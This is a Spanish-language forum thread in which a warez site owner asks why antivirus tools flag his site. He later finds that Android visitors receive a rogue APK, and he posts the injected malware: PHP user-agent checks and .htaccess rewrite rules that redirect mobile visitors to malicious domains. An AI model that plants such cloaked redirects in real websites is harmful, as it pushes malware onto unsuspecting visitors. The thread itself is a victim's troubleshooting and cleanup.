Mi sitio es detectado como Peligroso

Estado
No está abierto para más respuestas.
Mensajes
107
Puntuación de reacción
0
Que tal amigos de foro 20, en esta ocasion vengo a pedirles su ayuda, ya que desde hace 2 semanas avast empezo a detectar mi sitio como peligroso o malicioso y no deja navegar ni acceder al sitio (la url lo pondre al final del post), navegando en google encontre una herramienta para verificar si mi sitio contiene algun script maligno, pero segun el analisis de dicho sitio, mi sitio esta perfecto.

el problema es, que hoy en la mañana avg empezo a detectar lo mismo, asi que ya son dos antivirus que lo marcan como malicioso, sera que alguien puede decirme que hacer, para que esto deje de suceder, ya que esto pues me perjudica las visitas diarias al sitio web.

Url del sitio:

Código:
www.zonadescargasdirectas.net

Espero que alguien me pueda ayudar u orientar en que puedo hacer

Edito: le hiceun analisis con URL Avoid y me aparece esto:

http://www.urlvoid.com/scan/zonadescargasdirectas.net/

Como veran me aparece que no esta en blacklisted, y que no tiene nada malicioso, la duda es: porque me sigue apareciendo el mensaje de sitio peligroso o malicioso entonces?

saludines!!
 
Última edición:
Mensajes
78
Puntuación de reacción
0
Desconozco el motivo pero he dado al enlace que has puesto, he clicado en Update Report y si que sale que esta en : BACKLISTED

Captura de pantalla 2013-10-03 a la(s) 22.54.57.jpg


Que tal amigos de foro 20, en esta ocasion vengo a pedirles su ayuda, ya que desde hace 2 semanas avast empezo a detectar mi sitio como peligroso o malicioso y no deja navegar ni acceder al sitio (la url lo pondre al final del post), navegando en google encontre una herramienta para verificar si mi sitio contiene algun script maligno, pero segun el analisis de dicho sitio, mi sitio esta perfecto.

el problema es, que hoy en la mañana avg empezo a detectar lo mismo, asi que ya son dos antivirus que lo marcan como malicioso, sera que alguien puede decirme que hacer, para que esto deje de suceder, ya que esto pues me perjudica las visitas diarias al sitio web.

Url del sitio:

Código:
www.zonadescargasdirectas.net

Espero que alguien me pueda ayudar u orientar en que puedo hacer

Edito: le hiceun analisis con URL Avoid y me aparece esto:

zonadescargasdirectas.net safe website ? Check it now

Como veran me aparece que no esta en blacklisted, y que no tiene nada malicioso, la duda es: porque me sigue apareciendo el mensaje de sitio peligroso o malicioso entonces?

saludines!!
 
Mensajes
107
Puntuación de reacción
0
Sip, precisamente ahora me manda blacklisted tambien, que creen que puea ser? ya que solo un sitio lo determino como peligroso, ojala que alguien me pueda ayudar, porque estoy perdiendo muchos visitantes por este motivo

Gracias
 
Mensajes
107
Puntuación de reacción
0
Nop, ayer estuve revisando WMT de Google y no me aparece nada malo, es lo que me parece mas extraño, ya que revise el codigo, algun posible ataque o cosas asi, y no hay nada fuera de lo comun, a que creen que se pueda deber?
 

jackl007

Piedra
Usuario de Piedra
Mensajes
49
Puntuación de reacción
0
Probablemente es porque alojas malware en tu servidor para las descargas directas. No necesariamente es porque tu sitio tenga código malicioso, sino por los archivos que de el podrían descargar.

Entonces si una casa de antivirus encuentra más de un archivo infectado en tu servidor, entonces marca tu sitio. Por eso es mejor alojar las descargas en otro servidor para evitar las blacklist.

Si tus visitas bajan, te recomiendo que cambies de dominio, y apliques redirecciones para no perder tráfico ni posiciones en el buscador.
 

hostingrd

Piedra
Usuario de Piedra
Mensajes
36
Puntuación de reacción
0
Tírale un vistazo a tu pantalla cuando te salga de nuevo y te podre decir cual es el problema también puedes instalar el antivirus avast! Te mostrara el virus que tiene tu sitio web y hay te podremos ayudar tienes que hacerlo ya mismo sino google te bloqueara el sitio web
 
Mensajes
107
Puntuación de reacción
0
Pero no alojo nada en mi servidor, es un sitio warez, todas las descargas son directamente desde serviodres como mega, putlocker o freakshare.

Gracias

- - - Actualización- - -

Bueno he estado revisando, y algo qu eno habia notado, es que si intento acceder desde mi smartphone, no me abre la pagina de inicio, en su lugar me descarga una apk a mi cel, estoy revisando que es, conforme vea mas cosas las ire anotando

Saludos!!

- - - Actualización- - -

Actualizo, el archivo que descarga al momento de intentar acceder al sitio desde cualquier smartphone con android es esl siguieunte:

flvplayer_install.apk

si alguien tiene idea de como sacarlo de mi sitio que me eche una manita, intentare mientras

Saludos!!
 

jackl007

Piedra
Usuario de Piedra
Mensajes
49
Puntuación de reacción
0
Ese es el problema de usar Scripts Nulled: <!-- Nulled by N2C-TEAM -->

Primero busca el APK en tu servidor y bórralo. Luego tendrás que abrir archivo por archivo de tu web y darle una ojeada al código. Sabes de php básico??

He revisado el código HTML y aparentemente todo está normal.

PD: He entrado desde mi movil usando Opera y me muestra este mensaje: Visitar este sitio web puede resultar peligroso, se sabe que distribuye programas dañinos. Opera recomienda que no visite este sitio web. ..."

Desde mi iPad no se puede ingresar al sitio web, como si no fuera válido los dns.
 
Mensajes
107
Puntuación de reacción
0
Hola, y allevo un buen rato sacandolos codigos maliciosos, pero no encuentro la ap XD, segu note, este codigo hace una redireccion 301 en mi sitio web y lo redirige a otras paginas:

el codigo es este:

Código:
if(strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod") || strpos($_SERVER['HTTP_USER_AGENT'],"Symbian") || strpos($_SERVER['HTTP_USER_AGENT'],"j2me") || strpos($_SERVER['HTTP_USER_AGENT'],"windows mobile") || strpos($_SERVER['HTTP_USER_AGENT'],"midp")) {header('Location: http://nfs-android.org/');}


if(strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod") || strpos($_SERVER['HTTP_USER_AGENT'],"Symbian") || strpos($_SERVER['HTTP_USER_AGENT'],"j2me") || strpos($_SERVER['HTTP_USER_AGENT'],"windows mobile") || strpos($_SERVER['HTTP_USER_AGENT'],"midp")) {header('Location: http://opgrade.ws/');}


if(strpos($_SERVER['HTTP_USER_AGENT'],"iPhone") || strpos($_SERVER['HTTP_USER_AGENT'],"Android") || strpos($_SERVER['HTTP_USER_AGENT'],"webOS") || strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry") || strpos($_SERVER['HTTP_USER_AGENT'],"iPod") || strpos($_SERVER['HTTP_USER_AGENT'],"Symbian") || strpos($_SERVER['HTTP_USER_AGENT'],"j2me") || strpos($_SERVER['HTTP_USER_AGENT'],"windows mobile") || strpos($_SERVER['HTTP_USER_AGENT'],"midp")) {header('Location: http://opgrade.ws/');}

eso aparece en cada php que tengo en mi server

y los htaccess los modifico asi:

Código:
RewriteCond %{HTTP_USER_AGENT} (?i:iphone|ipad)
RewriteRule ^(/)?$ http://moderncombat-android.org/ [R=301]
RewriteCond %{HTTP_USER_AGENT} (?i:android)
RewriteRule ^(/)?$ http://moderncombat-android.org/ [R=301]
RewriteCond %{HTTP_USER_AGENT} (?i:symbian)
RewriteRule ^(/)?$ http://moderncombat-android.org/ [R=301]

RewriteCond %{HTTP_USER_AGENT} (?i:iphone|ipad)
RewriteRule ^(/)?$ http://googlanalytics.ws/ [R=301]
RewriteCond %{HTTP_USER_AGENT} (?i:android)
RewriteRule ^(/)?$ http://googlanalytics.ws/ [R=301]
RewriteCond %{HTTP_USER_AGENT} (?i:symbian)
RewriteRule ^(/)?$ http://googlanalytics.ws/ [R=301]

RewriteCond %{HTTP_USER_AGENT} (?i:iphone|ipad)
RewriteRule ^(/)?$ http://googlanalytics.ws/ [R=301]
RewriteCond %{HTTP_USER_AGENT} (?i:android)
RewriteRule ^(/)?$ http://googlanalytics.ws/ [R=301]
RewriteCond %{HTTP_USER_AGENT} (?i:symbian)
RewriteRule ^(/)?$ http://googlanalytics.ws/ [R=301]

me conviene poner otro cms, lo estoy pensando esto, porque mis visitas bajaron de 1000 a solo 50 XD, asi que pregunto mejor

saludos!!

- - - Actualización- - -

y bueno, despues de batallar mucho, me di cuenta que todo mi sitio esta infectado desde hace mas de 2 meses u.u, pasa que solo afectaba ciertas cosas, pero ya analizando a fondo todo los phps y hasta la base de datos tienen un codigo malicioso insertado, asi que me cambio a Wordpress aunque signifique empezar de cero, es mejor a sufrir problemas despues

Gracias por la ayuda amigos

Saludos!!
 
Estado
No está abierto para más respuestas.
Arriba